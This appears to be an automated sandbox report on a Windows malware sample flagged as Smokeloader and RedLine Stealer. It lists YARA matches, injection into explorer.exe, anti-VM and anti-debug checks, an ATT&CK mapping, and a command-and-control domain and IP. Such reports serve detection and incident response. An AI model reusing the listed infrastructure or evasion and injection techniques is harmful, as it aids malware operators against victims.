    Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_4e31426e; Author: unknown
    Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_4e31426e; Author: unknown
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR; Matched rule: Semi-Auto-generated - file ironshell.php.txt; Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_00403005 RtlCreateUserThread,NtTerminateProcess,0_2_00403005
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401561
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156F
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,EntryPoint,0_2_00401729
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_004023E5 NtQuerySystemInformation,0_2_004023E5
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; Code function: 0_2_004026A0 NtEnumerateKey,0_2_004026A0
    Source: C:\Users\user\AppData\Roaming\ifvwgru; Code function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401553
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00403005 RtlCreateUserThread,NtTerminateProcess,6_2_00403005
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401561
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156F
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,EntryPoint,6_2_00401729
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_004023E5 NtQuerySystemInformation,6_2_004023E5
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401583
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401587
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_004026A0 NtEnumerateKey,6_2_004026A0
    Source: C:\Windows\explorer.exeCode function: 2_2_02F229682_2_02F22968
    Source: C:\Windows\explorer.exeCode function: 2_2_087529682_2_08752968
    Source: vwaoMjcyAw.exe, 00000000.00000000.2199081111.0000000002AFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpace2 vs vwaoMjcyAw.exe
    Source: vwaoMjcyAw.exeBinary or memory string: OriginalFilenameSpace2 vs vwaoMjcyAw.exe
    Source: vwaoMjcyAw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
    Source: vwaoMjcyAw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ifvwgru.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@2/1
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02D095D9 CreateToolhelp32Snapshot,Module32First,0_2_02D095D9
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ifvwgruJump to behavior
    Source: vwaoMjcyAw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: vwaoMjcyAw.exeReversingLabs: Detection: 73%
    Source: vwaoMjcyAw.exeVirustotal: Detection: 76%
    Source: unknownProcess created: C:\Users\user\Desktop\vwaoMjcyAw.exe "C:\Users\user\Desktop\vwaoMjcyAw.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ifvwgru C:\Users\user\AppData\Roaming\ifvwgru
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: vwaoMjcyAw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\dugo_caves\betuw sib.pdb source: vwaoMjcyAw.exe, ifvwgru.2.dr

    Data Obfuscation

    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Unpacked PE file: 0.2.vwaoMjcyAw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Unpacked PE file: 6.2.ifvwgru.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_00403253 push eax; ret 0_2_0040332D
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_00401C64 push es; retf 0_2_00401C83
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_0040332A push eax; ret 0_2_0040332D
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_00402F91 push 60B44389h; retf 0_2_00402FAB
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_02BB2FF8 push 60B44389h; retf 0_2_02BB3012
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_02BB1CCB push es; retf 0_2_02BB1CEA
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_00403253 push eax; ret 6_2_0040332D
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_00401C64 push es; retf 6_2_00401C83
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_0040332A push eax; ret 6_2_0040332D
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_02C41CCB push es; retf 6_2_02C41CEA
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_02C42FF8 push 60B44389h; retf 6_2_02C43012
    Source: vwaoMjcyAw.exe | Static PE information: section name: .text entropy: 7.821971719130902
    Source: ifvwgru.2.dr | Static PE information: section name: .text entropy: 7.821971719130902
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ifvwgru (dropped file)

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\vwaomjcyaw.exe
    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\ifvwgru:Zone.Identifier read attributes | delete

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | API/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | API/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Roaming\ifvwgru | API/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Roaming\ifvwgru | API/Special instruction interceptor: Address: 7FFDB442D584
    Source: ifvwgru, 00000006.00000002.2486092912.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOKA
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 457
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 462
    Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 885
    Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 868
    Source: C:\Windows\explorer.exe TID: 6504 | Thread sleep count: 457 > 30
    Source: C:\Windows\explorer.exe TID: 3880 | Thread sleep count: 462 > 30
    Source: explorer.exe, 00000002.00000000.2256911237.000000000C354000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 00000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&B
    Source: explorer.exe, 00000002.00000002.3451553162.000000000C354000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ?\#CdRom&Ven_NECVMWar&Prod_VMware_
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
    Source: explorer.exe, 00000002.00000000.2255032281.00000000097F3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWws
    Source: explorer.exe, 00000002.00000000.2256911237.000000000C354000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
    Source: explorer.exe, 00000002.00000000.2254640839.0000000009605000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
    Source: explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | System information queried: ModuleInformation
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Process information queried: ProcessInformation

    Anti Debugging

    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | System information queried: CodeIntegrityInformation
    Source: C:\Users\user\AppData\Roaming\ifvwgru | System information queried: CodeIntegrityInformation
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Process queried: DebugPort
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Process queried: DebugPort
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_02BB0D90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_02BB092B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Code function: 0_2_02D08EB6 push dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_02C40D90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_02C4092B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Code function: 6_2_02EC9B4E push dword ptr fs:[00000030h]

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\explorer.exe | File created: ifvwgru.2.dr (dropped file)
    Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 80
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Thread created: C:\Windows\explorer.exe EIP: 8751A88
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Thread created: unknown EIP: 2F21A88
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\AppData\Roaming\ifvwgru | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
    Source: explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
    Source: explorer.exe, 00000002.00000002.3445039126.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
    Source: explorer.exe, 00000002.00000002.3443287218.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2251375594.0000000000D69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
    Source: explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
    Source: explorer.exe, 00000002.00000002.3448807647.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A
    Source: C:\Windows\explorer.exe | Code function: 2_2_087535B8 GetUserNameW

    Stealing of Sensitive Information

    Source: Yara match | File source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    Source: Yara match | File source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    MITRE ATT&CK Matrix (techniques matched by this analysis, with the number of signatures per technique; matrix cells without a count had no match)

    Tactic | Matched technique (signature count)
    Reconnaissance | none
    Resource Development | none
    Initial Access | none
    Execution | Exploitation for Client Execution (1)
    Persistence | DLL Side-Loading (1)
    Privilege Escalation | Process Injection (32); DLL Side-Loading (1)
    Defense Evasion | Masquerading (11); Virtualization/Sandbox Evasion (12); Process Injection (32); Hidden Files and Directories (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); File Deletion (1)
    Credential Access | none
    Discovery | Security Software Discovery (511); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); System Information Discovery (12)
    Lateral Movement | none
    Collection | Archive Collected Data (1)
    Command and Control | Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (113)
    Exfiltration | none
    Impact | none
    Behavior Graph (ID: 1496331, Sample: vwaoMjcyAw.exe, Startdate: 21/08/2024, Architecture: WINDOWS, Score: 100)

    Root node:
    - DNS/IP: selebration17io.io; 56.126.166.20.in-addr.arpa
    - Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 7 other signatures
    - Processes started: vwaoMjcyAw.exe; ifvwgru

    vwaoMjcyAw.exe:
    - Signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; 3 other signatures
    - Injects into: explorer.exe (36 3)

    ifvwgru:
    - Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

    explorer.exe (injected):
    - DNS/IP: selebration17io.io 188.40.141.211, 49717, 80 HETZNER-ASDE Germany
